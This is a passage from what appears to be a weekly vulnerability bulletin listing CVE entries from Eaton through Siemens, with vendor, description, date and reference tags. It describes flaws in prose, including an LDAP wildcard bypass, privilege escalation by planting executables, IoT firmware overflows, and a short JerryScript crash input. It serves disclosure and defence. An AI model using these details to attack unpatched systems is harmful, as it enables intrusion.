Eaton’s Secure connect mobile app v1.7.3 & prior stores the user login credentials in logcat file when user create or register the account on the Mobile app. A malicious app or unauthorized user can harvest the information and later on can use the information to monitor and control the user’s account and associated devices.
2020-08-12
not yet calculated

CVE-2020-6653
MISC

evga — precision_x1
 
The WinRing0.sys and WinRing0x64.sys drivers 1.2.0 in EVGA Precision X1 through 1.0.6 allow local users, including low integrity processes, to read and write to arbitrary memory locations. This allows any user to gain NT AUTHORITYSYSTEM privileges by mapping DevicePhysicalMemory into the calling process.
2020-08-11
not yet calculated

CVE-2020-14979
MISC
MISC

fortinet — fortios
 
A Default Configuration vulnerability in FortiOS may allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.
2020-08-14
not yet calculated

CVE-2019-5591
CONFIRM

galileo_cms — galileo_cms
 
There is stored cross site scripting (XSS) in Galileo CMS v0.042. Remote authenticated users could inject arbitrary web script or HTML via $page_title in /lib/Galileo/files/templates/page/show.html.ep (aka the PAGE TITLE Field).
2020-08-14
not yet calculated

CVE-2019-7410
CONFIRM
MISC
MISC
MISC

geutebrück — g-cam_and_g-code
 
Using a specially crafted URL command, a remote authenticated user can execute commands as root on the G-Cam and G-Code (Firmware Versions 1.12.0.25 and prior as well as the limited Versions 1.12.13.2 and 1.12.14.5).
2020-08-14
not yet calculated

CVE-2020-16205
MISC

gitlab — gitlab
 
For GitLab before 13.0.12, 13.1.6, 13.2.3 a memory exhaustion flaw exists due to excessive logging of an invite email error message.
2020-08-13
not yet calculated

CVE-2020-13280
CONFIRM
MISC

gitlab — gitlab
 
For GitLab before 13.0.12, 13.1.6, 13.2.3 after a group transfer occurs, members from a parent group keep their access level on the subgroup leading to improper access.
2020-08-13
not yet calculated

CVE-2020-13282
CONFIRM
MISC
MISC

gitlab — gitlab
 
In GitLab before 13.0.12, 13.1.6, and 13.2.3, improper access control was used on the Applications page.
2020-08-12
not yet calculated

CVE-2020-13290
CONFIRM
MISC
MISC

gitlab — gitlab
 
In GitLab before 13.2.3, project sharing could temporarily allow too permissive access.
2020-08-12
not yet calculated

CVE-2020-13291
CONFIRM
MISC

gnome — gnome-shell
 
An issue was discovered in certain configurations of GNOME gnome-shell through 3.36.4. When logging out of an account, the password box from the login dialog reappears with the password still visible. If the user had decided to have the password shown in cleartext at login time, it is then visible for a brief moment upon a logout. (If the password were never shown in cleartext, only the password length is revealed.)
2020-08-11
not yet calculated

CVE-2020-17489
MISC

google — android
 
A local, arbitrary code execution vulnerability exists in the SplitCompat.install endpoint in Android’s Play Core Library versions prior to 1.7.2. A malicious attacker could create an apk which targets a specific application, and if a victim were to install this apk, the attacker could perform a directory traversal, execute code as the targeted application and access the targeted application’s data on the Android device. We recommend all users update Play Core to version 1.7.2 or later.
2020-08-12
not yet calculated

CVE-2020-8913
CONFIRM

google — android
 
In C2 flame devices, there is a possible bypass of seccomp due to a missing configuration file. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-146059841
2020-08-13
not yet calculated

CVE-2020-0261
MISC

google — go-tpm
 
An improperly initialized ‘migrationAuth’ value in Google’s go-tpm TPM1.2 library versions prior to 0.3.0 can lead an eavesdropping attacker to discover the auth value for a key created with CreateWrapKey. An attacker listening in on the channel can collect both ‘encUsageAuth’ and ‘encMigrationAuth’, and then can calculate ‘usageAuth ^ encMigrationAuth’ as the ‘migrationAuth’ can be guessed for all keys created with CreateWrapKey. TPM2.0 is not impacted by this. We recommend updating your library to 0.3.0 or later, or, if you cannot update, to call CreateWrapKey with a random 20-byte value for ‘migrationAuth’.
2020-08-11
not yet calculated

CVE-2020-8918
CONFIRM

horndis — horndis
 
All versions of HoRNDIS are affected by an integer overflow in the RNDIS packet parsing routines. A malicious USB device can trigger disclosure of unrelated kernel memory to userspace applications on the host, or can cause the kernel to crash. Kernel memory disclosure is especially likely on 32-bit kernels; 64-bit kernels are more likely to crash on attempted exploitation. It is not believed that kernel memory corruption is possible, or that unattended kernel memory disclosure without the collaboration of a userspace program running on the host is possible. The vulnerability is in `HoRNDIS::receivePacket`. `msg_len`, `data_ofs`, and `data_len` can be controlled by an attached USB device, and a negative value of `data_ofs` can bypass the check for `(data_ofs + data_len + 8) > msg_len`, and subsequently can cause a wild pointer copy in the `mbuf_copyback` call. The software is not maintained and no patches are planned. Users of multi-tenant systems with HoRNDIS installed should only connect trusted USB devices to their system.
2020-08-12
not yet calculated

CVE-2020-15137
CONFIRM

huawei — fusioncomput
 
FusionCompute 8.0.0 has an information disclosure vulnerability. Due to the properly protection of certain information, attackers may exploit this vulnerability to obtain certain information.
2020-08-14
not yet calculated

CVE-2020-9229
MISC

huawei — fusioncomput
 
FusionCompute 8.0.0 has an information disclosure vulnerability. Due to the properly protection of certain information, attackers may exploit this vulnerability to obtain certain information.
2020-08-14
not yet calculated

CVE-2020-9228
MISC

inet — wireless_daemon
 
eapol.c in iNet wireless daemon (IWD) through 1.8 allows attackers to trigger a PTK reinstallation by retransmitting EAPOL Msg4/4.
2020-08-12
not yet calculated

CVE-2020-17497
MISC

intel — acceleration_stack
 
Improper access control in firmware for Intel(R) PAC with Arria(R) 10 GX FPGA before Intel Acceleration Stack version 1.2.1 may allow a privileged user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8684
MISC

intel — computing_improvement_program
 
Improper access control in subsystem for the Intel(R) Computing Improvement Program before version 2.4.5718 may allow an authenticated user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8736
MISC

intel — distribution_of_openvino_toolkit
 
Incorrect permissions in the Intel(R) Distribution of OpenVINO(TM) Toolkit before version 2020.2 may allow an authenticated user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-12287
MISC

intel — graphics_drivers
Out of bounds read in system driver for some Intel(R) Graphics Drivers before version 15.33.50.5129 may allow an authenticated user to potentially enable denial of service via local access.
2020-08-13
not yet calculated

CVE-2020-8682
MISC

intel — graphics_drivers
 
Out-of-bounds write in Kernel Mode Driver for some Intel(R) Graphics Drivers before version 26.20.100.7755 may allow an authenticated user to potentially enable denial of service via local access.
2020-08-13
not yet calculated

CVE-2020-8679
MISC

intel — graphics_drivers
 
Uncaught exception in the system driver for some Intel(R) Graphics Drivers before version 15.33.50.5129 may allow an authenticated user to potentially enable denial of service via local access.
2020-08-13
not yet calculated

CVE-2020-0512
MISC

intel — graphics_drivers
 
Out of bounds write for some Intel(R) Graphics Drivers before version 15.33.50.5129 may allow an authenticated user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-0513
MISC

intel — graphics_drivers
 
Out of bounds write in system driver for some Intel(R) Graphics Drivers before version 15.33.50.5129 may allow an authenticated user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8681
MISC

intel — graphics_drivers
 
Improper buffer restrictions in system driver for some Intel(R) Graphics Drivers before version 15.33.50.5129 may allow an authenticated user to potentially enable denial of service via local access.
2020-08-13
not yet calculated

CVE-2020-8683
MISC

intel — graphics_drivers
 
Race condition in some Intel(R) Graphics Drivers before version 15.40.45.5126 may allow an authenticated user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8680
MISC

intel — graphics_drivers
 
Out of bounds read in some Intel(R) Graphics Drivers before versions 15.45.31.5127 and 15.40.45.5126 may allow an authenticated user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-0510
MISC

intel — led_manager
 
Improper authentication in subsystem for Intel (R) LED Manager for NUC before version 1.2.3 may allow privileged user to potentially enable denial of service via local access.
2020-08-13
not yet calculated

CVE-2020-8685
MISC

intel — mailbox
 
Improper permissions in the installer for the Intel(R) Mailbox Interface driver, all versions, may allow an authenticated user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8743
MISC

intel — multiple_products
Buffer copy without checking size of input for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an authenticated user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8729
CONFIRM
MISC

intel — multiple_products
 
Incorrect execution-assigned permissions in the file system for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an authenticated user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8731
CONFIRM
MISC

intel — multiple_products
 
Improper authentication for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.
2020-08-13
not yet calculated

CVE-2020-8713
CONFIRM
MISC

intel — multiple_products
 
Buffer overflow in a daemon for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.
2020-08-13
not yet calculated

CVE-2020-8706
CONFIRM
MISC

intel — multiple_products
 
Improper authentication for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.
2020-08-13
not yet calculated

CVE-2020-8708
CONFIRM
MISC

intel — multiple_products
 
Heap-based buffer overflow in the firmware for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.
2020-08-13
not yet calculated

CVE-2020-8732
CONFIRM
MISC

intel — multiple_products
 
Buffer overflow in a subsystem for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow a privileged user to potentially enable denial of service via local access.
2020-08-13
not yet calculated

CVE-2020-8720
CONFIRM
MISC

intel — multiple_products
 
Improper authentication in socket services for some Intel(R) Server Boards, Server Systems and Compute Modules before version 2.45 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.
2020-08-13
not yet calculated

CVE-2020-8709
CONFIRM
MISC

intel — multiple_products
 
Buffer overflow in daemon for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.
2020-08-13
not yet calculated

CVE-2020-8707
CONFIRM
MISC

intel — multiple_products
 
Heap-based overflow for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an authenticated user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8730
CONFIRM
MISC

intel — multiple_products
 
Improper input validation in a subsystem for some Intel Server Boards, Server Systems and Compute Modules before version 1.59 may allow an authenticated user to potentially enable denial of service via local access.
2020-08-13
not yet calculated

CVE-2020-8717
CONFIRM
MISC

intel — multiple_products
 
Cross-site scripting for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.
2020-08-13
not yet calculated

CVE-2020-8723
CONFIRM
MISC

intel — multiple_products
 
Buffer overflow in a subsystem for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow a privileged user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8722
CONFIRM
MISC

intel — multiple_products
 
Improper input validation for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow a privileged user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8721
CONFIRM
MISC

intel — multiple_products
 
Buffer overflow in subsystem for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow a privileged user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8719
CONFIRM
MISC

intel — multiple_products
 
Buffer overflow in a subsystem for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an authenticated user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8718
CONFIRM
MISC

intel — multiple_products
 
Improper access control in the bootloader for some Intel(R) Server Boards, Server Systems and Compute Modules before version 2.45 may allow a privileged user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8711
CONFIRM
MISC

intel — multiple_products
 
Improper access control for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an authenticated user to potentially enable denial of service via local access.
2020-08-13
not yet calculated

CVE-2020-8716
CONFIRM
MISC

intel — multiple_products
 
Improper authentication for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an authenticated user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8714
CONFIRM
MISC

intel — multiple_products
 
Buffer overflow in a verification process for some Intel(R) Server Boards, Server Systems and Compute Modules before version 2.45 may allow an authenticated user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8712
CONFIRM
MISC

intel — multiple_products
 
Buffer overflow in the bootloader for some Intel(R) Server Boards, Server Systems and Compute Modules before version 2.45 may allow a privileged user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8710
CONFIRM
MISC

intel — multiple_products
 
Invalid pointer for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an unauthenticated user to potentially enable denial of service via local access.
2020-08-13
not yet calculated

CVE-2020-8715
CONFIRM
MISC

intel — nuc
 
Improper input validation in the firmware for Intel(R) NUCs may allow a privileged user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8742
MISC

intel — proset/wireless_wifi_products
 
Insecure inherited permissions in some Intel(R) PROSet/Wireless WiFi products on Windows* 7 and 8.1 before version 21.40.5.1 may allow an authenticated user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-0559
MISC

intel — raid_web_console_3
 
Improper input validation in the Intel(R) RAID Web Console 3 for Windows* may allow an unauthenticated user to potentially enable denial of service via network access.
2020-08-13
not yet calculated

CVE-2020-8688
MISC

intel — realsense_d400_series_uwp_driver
 
Improper permissions in the installer for the Intel(R) RealSense(TM) D400 Series UWP driver for Windows* 10 may allow an authenticated user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8763
MISC

intel — rste_software_raid_driver
 
Uncontrolled search path in the installer for Intel(R) RSTe Software RAID Driver for the Intel(R) Server Board M10JNP2SB before version 4.7.0.1119 may allow an authenticated user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8687
MISC

intel — server_board_families
 
Improper initialization in BIOS firmware for Intel(R) Server Board Families S2600ST, S2600BP and S2600WF may allow a privileged user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-12301
CONFIRM
MISC

intel — server_board_families
 
Uninitialized pointer in BIOS firmware for Intel(R) Server Board Families S2600CW, S2600KP, S2600TP, and S2600WT may allow a privileged user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-12300
CONFIRM
MISC

intel — server_board_families
 
Improper input validation in BIOS firmware for Intel(R) Server Board Families S2600ST, S2600BP and S2600WF may allow a privileged user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-12299
CONFIRM
MISC

intel — server_board_m10jnp2sb
 
Improper buffer restrictions in the firmware for Intel(R) Server Board M10JNP2SB before version 7.210 may allow a privileged user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8733
CONFIRM
MISC

intel — ssd_sct
 
Improper access control in the installer for Intel(R) SSD DCT versions before 3.0.23 may allow a privileged user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-8759
MISC

intel — thunderbolt_controllers
 
Reliance on untrusted inputs in a security decision in some Intel(R) Thunderbolt(TM) controllers may allow unauthenticated user to potentially enable information disclosure via physical access.
2020-08-13
not yet calculated

CVE-2019-14630
MISC

intel — wireless_bluetooth_products
 
Improper input validation for some Intel(R) Wireless Bluetooth(R) products may allow an authenticated user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-0555
MISC

intel — wireless_bluetooth_products
 
Race condition in software installer for some Intel(R) Wireless Bluetooth(R) products on Windows* 7, 8.1 and 10 may allow an unprivileged user to potentially enable escalation of privilege via local access.
2020-08-13
not yet calculated

CVE-2020-0554
MISC

intel — wireless_bluetooth_products
 
Out-of-bounds read in kernel mode driver for some Intel(R) Wireless Bluetooth(R) products on Windows* 10, may allow a privileged user to potentially enable information disclosure via local access.
2020-08-13
not yet calculated

CVE-2020-0553
MISC

intel — wireless_bluetooth_products
 
Insufficient control flow management for some Intel(R) Wireless Bluetooth(R) products may allow an unprivileged user to potentially enable denial of service via adjacent access.
2020-08-13
not yet calculated

CVE-2019-14620
MISC

intel — wireless_for_open_source
 
Improper buffer restrictions in the Intel(R) Wireless for Open Source before version 1.5 may allow an unauthenticated user to potentially enable denial of service via adjacent access.
2020-08-13
not yet calculated

CVE-2020-8689
MISC

ise — smart_connect_knx_valliant
 
ise smart connect KNX Vaillant 1.2.839 contain a Denial of Service.
2020-08-14
not yet calculated

CVE-2019-19643
MISC

jerryscript — jerryscript
 
JerryScript through 2.3.0 has a (function({a=arguments}){const arguments}) buffer over-read.
2020-08-13
not yet calculated

CVE-2020-24344
MISC

loway — queuemetrics
 
A SQL injection vulnerability at a tpf URI in Loway QueueMetrics before 19.10.21 allows remote authenticated attackers to execute arbitrary SQL commands via the TPF_XPAR1 parameter.
2020-08-13
not yet calculated

CVE-2020-15925
MISC

loway — queuemetrics
 
A SQL injection vulnerability in the qm_adm/qm_export_stats_run.do endpoint of Loway QueueMetrics before 19.10.21 allows remote authenticated users to execute arbitrary SQL commands via the exportId parameter.
2020-08-13
not yet calculated

CVE-2020-15947
MISC

lua — lua
 
Lua through 5.4.0 allows a stack redzone cross in luaO_pushvfstring because a protection mechanism wrongly calls luaD_callnoyield twice in a row.
2020-08-13
not yet calculated

CVE-2020-24342
MISC
MISC

mantisbt — mantisbt
 
An XSS issue was discovered in MantisBT before 2.24.2. Improper escaping on view_all_bug_page.php allows a remote attacker to inject arbitrary HTML into the page by saving it into a text Custom Field, leading to possible code execution in the browser of any user subsequently viewing the issue (if CSP settings allow it).
2020-08-12
not yet calculated

CVE-2020-16266
CONFIRM
CONFIRM

mcafee — data_loss_prevention
 
Unprotected Storage of Credentials vulnerability in McAfee Data Loss Prevention (DLP) for Mac prior to 11.5.2 allows local users to gain access to the ADRMS username and password via unprotected log files containing plain text
2020-08-13
not yet calculated

CVE-2020-7306
CONFIRM

mcafee — data_loss_prevention_epo_extension
 
Cross site request forgery vulnerability in McAfee Data Loss Prevention (DLP) ePO extension prior to 11.5.3 allows authenticated remote attacker to embed a CRSF script via adding a new label.
2020-08-13
not yet calculated

CVE-2020-7304
CONFIRM

mcafee — data_loss_prevention_epo_extension
 
Unrestricted Upload of File with Dangerous Type in McAfee Data Loss Prevention (DLP) ePO extension prior to 11.5.3 allows authenticated attackers to upload malicious files to the DLP case management section via lack of sanity checking.
2020-08-13
not yet calculated

CVE-2020-7302
MISC

mcafee — data_loss_prevention_epo_extension
 
Cross Site scripting vulnerability in McAfee Data Loss Prevention (DLP) ePO extension prior to 11.5.3 allows authenticated attackers to trigger alerts via the file upload tab in the DLP case management section.
2020-08-12
not yet calculated

CVE-2020-7301
CONFIRM

mcafee — data_loss_prevention_epo_extension
 
Improper Authorization vulnerability in McAfee Data Loss Prevention (DLP) ePO extension prior to 11.5.3 allows authenticated remote attackers to change the configuration when logged in with view only privileges via carefully constructed HTTP post messages.
2020-08-12
not yet calculated

CVE-2020-7300
CONFIRM

mcafee — data_loss_prevention_epo_extension
 
Privilege escalation vulnerability in McAfee Data Loss Prevention (DLP) ePO extension prior to 11.5.3 allows a low privileged remote attacker to create new rule sets via incorrect validation of user credentials.
2020-08-13
not yet calculated

CVE-2020-7305
CONFIRM

megvii — koala
 
Lack of authentication in the network relays used in MEGVII Koala 2.9.1-c3s allows attackers to grant physical access to anyone by sending packet data to UDP port 5000.
2020-08-14
not yet calculated

CVE-2020-17475
MISC

microsoft — composer-setup
 
In Composer-Setup for Windows before version 6.0.0, if the developer’s computer is shared with other users, a local attacker may be able to exploit the following scenarios. 1. A local regular user may modify the existing `C:ProgramDataComposerSetupbincomposer.bat` in order to get elevated command execution when composer is run by an administrator. 2. A local regular user may create a specially crafted dll in the `C:ProgramDataComposerSetupbin` folder in order to get Local System privileges. See: https://itm4n.github.io/windows-server-netman-dll-hijacking. 3. If the directory of the php.exe selected by the user is not in the system path, it is added without checking that it is admin secured, as per Microsoft guidelines. See: https://msrc-blog.microsoft.com/2018/04/04/triaging-a-dll-planting-vulnerability.
2020-08-14
not yet calculated

CVE-2020-15145
MISC
CONFIRM

mozilla — multiple_products
 
Mozilla developers and community members reported memory safety bugs present in Firefox 78 and Firefox ESR 78.0. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 79, Firefox ESR < 68.11, Firefox ESR < 78.1, Thunderbird < 68.11, and Thunderbird < 78.1.
2020-08-10
not yet calculated

CVE-2020-15659
SUSE
SUSE
SUSE
MISC
MISC
MISC
MISC
MISC
MISC

nginx — njs
 
njs through 0.4.3, used in NGINX, allows control-flow hijack in njs_value_property in njs_value.c. NOTE: the vendor considers the issue to be “fluff” in the NGINX use case because there is no remote attack surface.
2020-08-13
not yet calculated

CVE-2020-24349
MISC

nginx — njs
 
njs through 0.4.3, used in NGINX, has an out-of-bounds read in njs_lvlhsh_level_find in njs_lvlhsh.c.
2020-08-13
not yet calculated

CVE-2020-24347
MISC

nginx — njs
 
njs through 0.4.3, used in NGINX, has an out-of-bounds read in njs_json_stringify_iterator in njs_json.c.
2020-08-13
not yet calculated

CVE-2020-24348
MISC

nim — nim
 
In Nim 1.2.4, the standard library browsers mishandles the URL argument to browsers.openDefaultBrowser. This argument can be a local file path that will be opened in the default explorer. An attacker can pass one argument to the underlying open command to execute arbitrary registered system commands.
2020-08-14
not yet calculated

CVE-2020-15692
MISC
CONFIRM

nim — nim
 
In Nim 1.2.4, the standard library httpClient is vulnerable to a CR-LF injection in the target URL. An injection is possible if the attacker controls any part of the URL provided in a call (such as httpClient.get or httpClient.post), the User-Agent header value, or custom HTTP header names or values.
2020-08-14
not yet calculated

CVE-2020-15693
MISC
CONFIRM

nim — nim
 
In Nim 1.2.4, the standard library httpClient fails to properly validate the server response. For example, httpClient.get().contentLength() does not raise any error if a malicious server provides a negative Content-Length.
2020-08-14
not yet calculated

CVE-2020-15694
MISC
CONFIRM

pactware — pactware
 
In PACTware before 4.1 SP6 and 5.x before 5.0.5.31, passwords are stored in an insecure manner, and may be modified by an attacker with no knowledge of the current passwords.
2020-08-11
not yet calculated

CVE-2020-9404
CONFIRM

palo_alto_networks — pan-os
 
When SSL/TLS Forward Proxy Decryption mode has been configured to decrypt the web transactions, the PAN-OS URL filtering feature inspects the HTTP Host and URL path headers for policy enforcement on the decrypted HTTPS web transactions but does not consider Server Name Indication (SNI) field within the TLS Client Hello handshake. This allows a compromised host in a protected network to evade any security policy that uses URL filtering on a firewall configured with SSL Decryption in the Forward Proxy mode. A malicious actor can then use this technique to evade detection of communication on the TLS handshake phase between a compromised host and a remote malicious server. This technique does not increase the risk of a host being compromised in the network. It does not impact the confidentiality or availability of a firewall. This is considered to have a low impact on the integrity of the firewall because the firewall fails to enforce a policy on certain traffic that should have been blocked. This issue does not impact the URL filtering policy enforcement on clear text or encrypted web transactions. This technique can be used only after a malicious actor has compromised a host in the protected network and the TLS/SSL Decryption feature is enabled for the traffic that the attacker controls. Palo Alto Networks is not aware of any malware that uses this technique to exfiltrate data. This issue is applicable to all current versions of PAN-OS.
2020-08-12
not yet calculated

CVE-2020-2035
CONFIRM
CONFIRM

pegasystems — pega_platform
 
Pega Platform 8.2.1 allows LDAP injection because a username can contain a * character and can be of unlimited length. An attacker can specify four characters of a username, followed by the * character, to bypass access control.
2020-08-13
not yet calculated

CVE-2019-16374
MISC
MISC

phpjs — phpjs
 
All versions of phpjs are vulnerable to Prototype Pollution via parse_str.
2020-08-14
not yet calculated

CVE-2020-7700
CONFIRM

phpjs — phpjs
 
madlib-object-utils before 0.1.7 is vulnerable to Prototype Pollution via setValue.
2020-08-14
not yet calculated

CVE-2020-7701
CONFIRM

pnotes — andrey_gruber_pnotes.net
 
A File Upload Vulnerability in PNotes – Andrey Gruber PNotes.NET v3.8.1.2 allows a local attacker to execute arbitrary code via the Miscellaneous ” External Programs by uploading the malicious .exe file to the external program.
2020-08-14
not yet calculated

CVE-2020-22721
MISC

python — python
 
In openapi-python-client before version 0.5.3, clients generated with a maliciously crafted OpenAPI Document can generate arbitrary Python code. Subsequent execution of this malicious client is arbitrary code execution.
2020-08-14
not yet calculated

CVE-2020-15142
MISC
MISC
CONFIRM
MISC

python — python
 
In openapi-python-client before version 0.5.3, there is a path traversal vulnerability. If a user generated a client using a maliciously crafted OpenAPI document, it is possible for generated files to be placed in arbitrary locations on disk.
2020-08-14
not yet calculated

CVE-2020-15141
MISC
MISC
CONFIRM
MISC

qt — qt
 
An issue was discovered in Qt through 5.12.9, and 5.13.x through 5.15.x before 5.15.1. read_xbm_body in gui/image/qxbmhandler.cpp has a buffer over-read.
2020-08-12
not yet calculated

CVE-2020-17507
MISC
MISC
MISC
FEDORA

radare2 — radare2
 
radare2 4.5.0 misparses signature information in PE files, causing a segmentation fault in r_x509_parse_algorithmidentifier in libr/util/x509.c. This is due to a malformed object identifier in IMAGE_DIRECTORY_ENTRY_SECURITY.
2020-08-11
not yet calculated

CVE-2020-17487
MISC

rapid_software — rapid_scada
 
Rapid Software LLC Rapid SCADA 5.8.0 is affected by a local privilege escalation vulnerability in the ScadaAgentSvc.exe executable file. An attacker can obtain admin privileges by placing a malicious .exe file in the application and renaming it ScadaAgentSvc.exe, which would result in executing the binary as NT AUTHORITYSYSTEM in a Windows operating system. For example, an attacker can plant a reverse shell from a low privileged user account and by restarting the computer, the malicious service will be started as NT AUTHORITYSYSTEM by giving the attacker full system access to the remote PC.
2020-08-14
not yet calculated

CVE-2020-22722
MISC

readytalk — avian
 
** UNSUPPORTED WHEN ASSIGNED ** An issue was discovered in ReadyTalk Avian 1.2.0. The vm::arrayCopy method defined in classpath-common.h contains multiple boundary checks that are performed to prevent out-of-bounds memory read/write. However, two of these boundary checks contain an integer overflow that leads to a bypass of these checks, and out-of-bounds read/write. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
2020-08-12
not yet calculated

CVE-2020-17360
MISC
MISC

readytalk — avian
 
** UNSUPPORTED WHEN ASSIGNED ** An issue was discovered in ReadyTalk Avian 1.2.0. The vm::arrayCopy method defined in classpath-common.h returns silently when a negative length is provided (instead of throwing an exception). This could result in data being lost during the copy, with varying consequences depending on the subsequent use of the destination buffer. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
2020-08-12
not yet calculated

CVE-2020-17361
MISC
MISC

rosariosis — rosariosis
 
Reflected Cross-Site Scripting vulnerability in Modules.php in RosarioSIS Student Information System < 6.5.1 allows remote attackers to execute arbitrary web script via embedding javascript or HTML tags in a GET request.
2020-08-12
not yet calculated

CVE-2020-13278
MISC
MISC
CONFIRM

securepoint — securepoint_ssl_vpn_client
 
A local privilege escalation vulnerability in SPSSLVpnService.exe in Securepoint GmbH from Lueneburg Securepoint SSL VPN Client 2.0.28 allows a local attacker to gain privileges via a crafted malicious exe and perform unauthorized actions.
2020-08-14
not yet calculated

CVE-2020-22720
MISC

shenzhen_hichip_vision_technology — multiple_devices
 
Firmware developed by Shenzhen Hichip Vision Technology (V6 through V20), as used by many different vendors in millions of Internet of Things devices, suffers from cryptographic issues that allow remote attackers to access user session data, as demonstrated by eavesdropping on user video/audio streams, capturing credentials, and compromising devices. This affects products marketed under the following brand names: Accfly, Alptop, Anlink, Besdersec, BOAVISION, COOAU, CPVAN, Ctronics, D3D Security, Dericam, Elex System, Elite Security, ENSTER, ePGes, Escam, FLOUREON, GENBOLT, Hongjingtian (HJT), ICAMI, Iegeek, Jecurity, Jennov, KKMoon, LEFTEK, Loosafe, Luowice, Nesuniq, Nettoly, ProElite, QZT, Royallite, SDETER, SV3C, SY2L, Tenvis, ThinkValue, TOMLOV, TPTEK, WGCC, and ZILINK.
2020-08-10
not yet calculated

CVE-2020-9528
MISC
MISC

shenzhen_hichip_vision_technology — multiple_devices
 
Firmware developed by Shenzhen Hichip Vision Technology (V6 through V20, after 2018-08-09 through 2020), as used by many different vendors in millions of Internet of Things devices, suffers from buffer overflow vulnerability that allows unauthenticated remote attackers to execute arbitrary code via the peer-to-peer (P2P) service. This affects products marketed under the following brand names: Accfly, Alptop, Anlink, Besdersec, BOAVISION, COOAU, CPVAN, Ctronics, D3D Security, Dericam, Elex System, Elite Security, ENSTER, ePGes, Escam, FLOUREON, GENBOLT, Hongjingtian (HJT), ICAMI, Iegeek, Jecurity, Jennov, KKMoon, LEFTEK, Loosafe, Luowice, Nesuniq, Nettoly, ProElite, QZT, Royallite, SDETER, SV3C, SY2L, Tenvis, ThinkValue, TOMLOV, TPTEK, WGCC, and ZILINK.
2020-08-10
not yet calculated

CVE-2020-9527
MISC
MISC

shenzhen_hichip_vision_technology — multiple_devices
 
Firmware developed by Shenzhen Hichip Vision Technology (V6 through V20), as used by many different vendors in millions of Internet of Things devices, suffers from a privilege escalation vulnerability that allows attackers on the local network to reset the device’s administrator password. This affects products marketed under the following brand names: Accfly, Alptop, Anlink, Besdersec, BOAVISION, COOAU, CPVAN, Ctronics, D3D Security, Dericam, Elex System, Elite Security, ENSTER, ePGes, Escam, FLOUREON, GENBOLT, Hongjingtian (HJT), ICAMI, Iegeek, Jecurity, Jennov, KKMoon, LEFTEK, Loosafe, Luowice, Nesuniq, Nettoly, ProElite, QZT, Royallite, SDETER, SV3C, SY2L, Tenvis, ThinkValue, TOMLOV, TPTEK, WGCC, and ZILINK.
2020-08-10
not yet calculated

CVE-2020-9529
MISC
MISC

siemens — automation_license_manager
 
